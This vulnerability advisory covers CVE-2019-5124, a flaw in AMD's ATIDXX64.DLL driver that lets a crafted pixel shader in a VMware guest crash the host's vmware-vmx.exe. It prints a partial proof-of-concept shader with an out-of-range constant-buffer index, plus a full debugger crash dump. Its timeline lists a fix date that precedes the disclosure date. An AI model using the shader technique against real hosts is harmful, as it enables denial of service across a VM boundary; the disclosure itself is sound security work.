CVE-2019-5124
An exploitable out-of-bounds read vulnerability exists in AMD ATIDXX64.DLL driver, version 26.20.13001.50005. A specially crafted pixel shader can cause a denial of service. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from VMware guest, affecting VMware host.
AMD ATIDXX64.DLL (26.20.13001.50005) running on Radeon RX 550 / 550 Series VMware Workstation 15 (15.1.0 build-13591040) with Windows 10 x64 as guestVM
http://amd.com http://vmware.com
8.6 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
CWE-476: NULL Pointer Dereference
This vulnerability can be triggered by supplying a malformed pixel shader (inside VMware guest OS). Such attack can be triggered from VMware guest usermode to cause a NULL pointer dereference in the vmware-vmx.exe
process on host, or theoretically through WEBGL (remote website).
The DCL_CONSTANT_BUFFER
instruction declares a shader constant buffer, cbN[size]
, where N is an integer that denotes the constant-buffer-register number, and size is an integer that denotes the number of elements in the buffer. By modifying the shader instruction operand (in the DIV
instruction) and referencing to an element outside of the declared buffer, it is possible to cause a NULL pointer dereference.
Example shader:
ps_4_0
00000000: dcl_constant_buffer cb0[2].xyzw, immediateIndexed
00000001: customdata
00000002: dcl_input_ps_siv constant v0.xyzw, position
00000003: dcl_output o0.xyzw
00000004: dcl_temps 8
...
00000011: div r4.x, l(1, 1, 1, 1), cb0[65199].yyyy
NULL pointer dereference during memcpy
operation (source argument is NULL):
0:015> .ecxr
rax=0000025be3f2c010 rbx=0000000000000010 rcx=00000000000a0000
rdx=fffffda41c0d3ff0 rsi=0000000000000000 rdi=0000025be3f2c010
rip=00007ffebb6718f7 rsp=000000f1551f9008 rbp=000000f1551f9078
r8=00000000000a0000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000001 r12=000000f1551f9038 r13=00000000000025f8
r14=0000025be3f2c010 r15=0000000000000002
iopl=0 nv up ei pl nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010203
atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x96da7:
00007ffe`bb6718f7 f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
0:015> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** WARNING: Unable to verify checksum for amdihk64.dll
KEY_VALUES_STRING: 1
Key : AV.Dereference
Value: NullPtr
Key : AV.Fault
Value: Read
Key : Analysis.CPU.Sec
Value: 0
Key : Analysis.DebugAnalysisProvider.CPP
Value: Create: 8007007e on CLAB
Key : Analysis.DebugData
Value: CreateObject
Key : Analysis.DebugModel
Value: CreateObject
Key : Analysis.Elapsed.Sec
Value: 16
Key : Analysis.Memory.CommitPeak.Mb
Value: 132
Key : Analysis.System
Value: CreateObject
Key : Timeline.Process.Start.DeltaSec
Value: 542
APPLICATION_VERIFIER_FLAGS: 0
CONTEXT: (.ecxr)
rax=0000025be3f2c010 rbx=0000000000000010 rcx=00000000000a0000
rdx=fffffda41c0d3ff0 rsi=0000000000000000 rdi=0000025be3f2c010
rip=00007ffebb6718f7 rsp=000000f1551f9008 rbp=000000f1551f9078
r8=00000000000a0000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000001 r12=000000f1551f9038 r13=00000000000025f8
r14=0000025be3f2c010 r15=0000000000000002
iopl=0 nv up ei pl nz na pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010203
atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x96da7:
00007ffe`bb6718f7 f3a4 rep movs byte ptr [rdi],byte ptr [rsi]
Resetting default scope
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffebb6718f7 (atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x0000000000096da7)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
PROCESS_NAME: vmware-vmx.exe
READ_ADDRESS: 0000000000000000
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 0000000000000000
STACK_TEXT:
000000f1`551f9008 00007ffe`bb53f171 : 00000000`00000003 00000000`00000010 00000000`000a0000 00000000`00000001 : atidxx64!AmdLiquidVrD3D11WrapDeviceContext+0x96da7
000000f1`551f9010 00007ffe`bb53ed84 : 000000f1`551f9160 0000025b`ee479120 0000025b`e38899d0 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7c4ea1
000000f1`551f90b0 00007ffe`bb520cac : 00000000`00000000 000000f1`551f9210 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7c4ab4
000000f1`551f9110 00007ffe`bb51f6af : 0000025b`e3856520 000000f1`00000001 000000f1`551f9380 0000025b`de870150 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a69dc
000000f1`551f92c0 00007ffe`bb504dab : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a53df
000000f1`551f9430 00007ffe`bb5048e2 : 00000000`00000000 0000025b`e3856520 0000025b`e2ba4960 000000f1`551fd140 : atidxx64!AmdDxGsaFreeCompiledShader+0x78aadb
000000f1`551f9490 00007ffe`bb535303 : 0000025b`e3856520 00000000`00000000 0000025b`de85a6d0 000000f1`551fd140 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a612
000000f1`551fd0f0 00007ffe`bb5047b7 : 00000000`0000023c 0000025b`e37f3f80 0000025b`de884c30 0000025b`de851970 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bb033
000000f1`551fd120 00007ffe`bb5d4351 : 00000000`00000000 000000f1`551fd460 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x78a4e7
000000f1`551fd180 00007ffe`bad94cca : 00000000`00000000 00000000`00000000 000000f1`551fd460 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x85a081
000000f1`551fd1c0 00007ffe`bad94b13 : 0000025b`e2ba8560 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a9fa
000000f1`551fd200 00007ffe`bad1c05e : 00000000`00000001 00000000`00000000 0000025a`54f80434 00007ffe`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a843
000000f1`551fd290 00007ffe`bb488176 : 00000000`00000000 000000f1`551fd460 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
000000f1`551fd2d0 00007ffe`bad2d8b1 : 0000025b`e4b46f48 0000025b`e4c9571c 0000025b`e443c390 00000000`00000001 : atidxx64!AmdDxGsaFreeCompiledShader+0x70dea6
000000f1`551fd440 00007ffe`d0cf8ecc : 00000000`00000000 000000f1`551fd670 0000025b`e4b46f38 00007ffe`d77fba17 : atidxx64!XdxQueryTlsLookupTable+0x185c1
000000f1`551fd570 00007ffe`d0d0294f : 000000f1`00000001 0000025b`e44387a8 0000025b`e4b46f38 0000025b`e442e890 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
000000f1`551fd7d0 00007ffe`d0d0288a : 000000f1`551fdeb0 00007ffe`d0eb2388 0000025b`e4b46de0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
000000f1`551fd860 00007ffe`d0ceee48 : 0000025b`e4b46e28 000000f1`551fdeb0 000000f1`551fdee0 00007ffe`d0eb2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
000000f1`551fd8c0 00007ffe`d0cfb16d : 00000000`00000000 0000025b`e4b46de0 00000000`00000000 0000025a`54f80000 : d3d11!CDevice::CreateLayeredChild+0xc88
000000f1`551fdd00 00007ffe`d0cfb940 : 0000025b`e4b46de0 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
000000f1`551fde70 00007ffe`d0ce14f4 : 0000025b`e43d7d30 00000000`00000009 0000025b`e4c95680 0000025b`e43d8568 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
000000f1`551fe060 00007ffe`d0ce1463 : 0000025b`e4c95680 00000000`0000b000 000000f1`551fe349 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
000000f1`551fe0c0 00007ffe`d0ce11e8 : 0000025b`e43d8568 0000025b`e4c95680 00000000`00000548 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
000000f1`551fe270 00007ff7`9e148af2 : 0000025b`e4ee0040 00007ff7`9de90000 0000025b`e43d8568 0000025b`e468d490 : d3d11!CDevice::CreatePixelShader+0x28
000000f1`551fe2c0 00007ff7`9e14a3d5 : 0000025b`e4ee0040 00007ff7`9de90000 00007ff7`9de90000 0000025b`de670cc0 : vmware_vmx+0x2b8af2
000000f1`551fe3b0 00007ff7`9e149252 : 0000025b`e4ee7fc0 00007ff7`9de90000 0000025b`e4ee0040 0000025b`e4ee0040 : vmware_vmx+0x2ba3d5
000000f1`551ff400 00007ff7`9e145741 : 00000000`fffe4000 0000025b`e4ee0040 00000000`00000003 0000025b`e4c86690 : vmware_vmx+0x2b9252
000000f1`551ff450 00007ff7`9e0a1af9 : 00007ff7`9e0a1a30 0000025b`e4c86680 00000000`00000028 00007ff7`9e184120 : vmware_vmx+0x2b5741
000000f1`551ff490 00007ff7`9e032ad2 : 00000000`00000020 00007ff7`9e0a1a30 000000f1`551ff5f0 00000000`00000028 : vmware_vmx+0x211af9
000000f1`551ff4f0 00007ff7`9e030b9f : 000000f1`551ff710 00000000`00000020 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a2ad2
000000f1`551ff6b0 00007ff7`9df865c0 : 0000025a`58aa0600 0000025a`58aa06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0b9f
000000f1`551ff6e0 00007ff7`9e4ac800 : 00007ff7`9df864a0 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65c0
000000f1`551ff730 00007ffe`d73b7bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c800
000000f1`551ff7c0 00007ffe`d782cee1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f1`551ff7f0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
SYMBOL_NAME: atidxx64!AmdLiquidVrD3D11WrapDeviceContext+96da7
MODULE_NAME: atidxx64
IMAGE_NAME: atidxx64.dll
STACK_COMMAND: ~15s ; .ecxr ; kb
FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_atidxx64.dll!AmdLiquidVrD3D11WrapDeviceContext
OS_VERSION: 10.0.18362.1
BUILDLAB_STR: 19h1_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
FAILURE_ID_HASH: {0ce71f05-194d-c22e-2d78-ff6355a2ad32}
2019-10-23 - Vendor Disclosure
2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release
Discovered by Piotr Bania of Cisco Talos.